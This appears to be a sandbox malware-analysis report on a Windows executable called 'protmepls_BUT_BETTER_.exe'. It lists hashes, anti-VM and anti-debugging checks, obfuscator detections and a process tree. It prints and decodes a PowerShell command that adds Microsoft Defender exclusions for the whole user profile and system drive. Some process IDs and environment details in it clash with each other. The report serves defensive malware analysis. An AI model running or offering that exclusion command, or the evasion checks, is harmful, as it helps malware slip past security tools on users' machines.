Analysis
max time kernel: 149s
max time network: 156s
platform: windows10-2004_x64
resource: win10v2004-20230703-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
submitted: 15/07/2023, 22:08
Behavioral task: behavioral1
Sample: protmepls_BUT_BETTER_.exe
Resource: win7-20230712-en
General
Target: protmepls_BUT_BETTER_.exe
Size: 15.7MB
MD5: 3b175c33f73bcf59abb1b2b50fed49de
SHA1: 13145dc1dfa3e6e6f1b762f8a016c298d3de744b
SHA256: dcfbfc44d17764159537d568afbe19e7bd981f08888c1e9fce9024a993858c28
SHA512: c3f59ef7f099c06e7d5bb45b72e8f206153c0e45b487eb8b6b801542bf6845aa5ee54c1e4800801e503c477cc7068593a95cc37cd410dd8e021cbf948ba83deb
SSDEEP: 393216:5kLHj6tecPWNYP/VaMHAojfY4L4wAqvHV1opGH3u7n0dFsg0QQe+GrJG7bmxbo6:5ej6tenu/Pgojw8iqfTopL7yFaVe+GkW
Malware Config
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | protmepls_BUT_BETTER_.exe
Downloads MZ/PE file
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | protmepls_BUT_BETTER_.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | protmepls_BUT_BETTER_.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Control Panel\International\Geo\Nation | protmepls_BUT_BETTER_.exe
Executes dropped EXE 2 IoCs
pid | Process
1648 | CompPkgSrv.exe
3932 | OMM Loader.exe
Obfuscated with Agile.Net obfuscator 3 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource | yara_rule
behavioral2/files/0x00080000000231df-143.dat | agile_net
behavioral2/files/0x00080000000231df-168.dat | agile_net
behavioral2/files/0x00080000000231df-170.dat | agile_net
resource | yara_rule
behavioral2/memory/1644-133-0x0000000000400000-0x0000000001F4A000-memory.dmp | themida
behavioral2/memory/1644-135-0x0000000000400000-0x0000000001F4A000-memory.dmp | themida
behavioral2/memory/1644-166-0x0000000000400000-0x0000000001F4A000-memory.dmp | themida
behavioral2/memory/1644-171-0x0000000000400000-0x0000000001F4A000-memory.dmp | themida
Checks whether UAC is enabled
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | protmepls_BUT_BETTER_.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid | Process
1644 | protmepls_BUT_BETTER_.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
NTFS ADS 1 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 777007.crdownload:SmartScreen | msedge.exe
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 4452 powershell.exe 4452 powershell.exe 2576 msedge.exe 2576 msedge.exe 3492 msedge.exe 3492 msedge.exe 5428 identity_helper.exe 5428 identity_helper.exe 1380 msedge.exe 1380 msedge.exe 1380 msedge.exe 1380 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4452 powershell.exe -
Suspicious use of FindShellTrayWindow 53 IoCs
pid Process 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1644 wrote to memory of 4452 1644 protmepls_BUT_BETTER_.exe 93 PID 1644 wrote to memory of 4452 1644 protmepls_BUT_BETTER_.exe 93 PID 1644 wrote to memory of 4452 1644 protmepls_BUT_BETTER_.exe 93 PID 1644 wrote to memory of 1648 1644 protmepls_BUT_BETTER_.exe 108 PID 1644 wrote to memory of 1648 1644 protmepls_BUT_BETTER_.exe 108 PID 1644 wrote to memory of 1648 1644 protmepls_BUT_BETTER_.exe 108 PID 1648 wrote to memory of 3932 1648 CompPkgSrv.exe 96 PID 1648 wrote to memory of 3932 1648 CompPkgSrv.exe 96 PID 3932 wrote to memory of 3492 3932 OMM Loader.exe 98 PID 3932 wrote to memory of 3492 3932 OMM Loader.exe 98 PID 3492 wrote to memory of 2004 3492 msedge.exe 99 PID 3492 wrote to memory of 2004 3492 msedge.exe 99 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 2576 3492 msedge.exe 102 PID 3492 wrote to memory of 2576 3492 msedge.exe 102 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104
Processes
C:\Users\Admin\AppData\Local\Temp\protmepls_BUT_BETTER_.exe (PID 1644, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\protmepls_BUT_BETTER_.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4452, depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAbQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AdwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAaABxACMAPgA="
    Decoded -EncodedCommand (UTF-16LE base64): <#wmg#>Add-MpPreference <#mwa#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#puf#> -Force <#thq#>
    The command adds Microsoft Defender scan exclusions for the entire user profile and the system drive; the <#...#> tokens are empty PowerShell block comments and do not change what runs.
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\protmepls.exe (PID 1648, depth 2)
    Command line: "C:\Users\Admin\protmepls.exe"
    C:\Users\Admin\AppData\Local\Temp\protmepls_b69eae24-8547-42a0-be3a-b8f55eaf90b1\OMM Loader.exe (PID 3932, depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\protmepls_b69eae24-8547-42a0-be3a-b8f55eaf90b1\OMM Loader.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3492, depth 4)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=x64&rid=win10-x64&apphost_version=6.0.13&gui=true
        The URL is the .NET apphost's missing-runtime page (apphost_version=6.0.13), so Edge was started by OMM Loader.exe because no .NET 6 runtime was present in the sandbox; the msedge.exe and identity_helper.exe entries below are the browser rendering that page, not behaviour of the sample itself.
        - Enumerates system info in registry
        - NTFS ADS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of WriteProcessMemory
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2004, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc5bd046f8,0x7ffc5bd04708,0x7ffc5bd04718
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2576, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
          - Suspicious behavior: EnumeratesProcesses
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 764, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2668, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4332, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1292, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3124, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4024, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4676, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3468 /prefetch:8
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4148, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 924, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5908 /prefetch:8
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5088, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 456, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5268, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5260, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 5400, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5756 /prefetch:8
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 5428, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5756 /prefetch:8
          - Suspicious behavior: EnumeratesProcesses
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1380, depth 5)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6272 /prefetch:2
          - Suspicious behavior: EnumeratesProcesses
C:\Windows\System32\CompPkgSrv.exe (PID 1712, depth 1)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe (PID 1648, depth 1)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v6
Downloads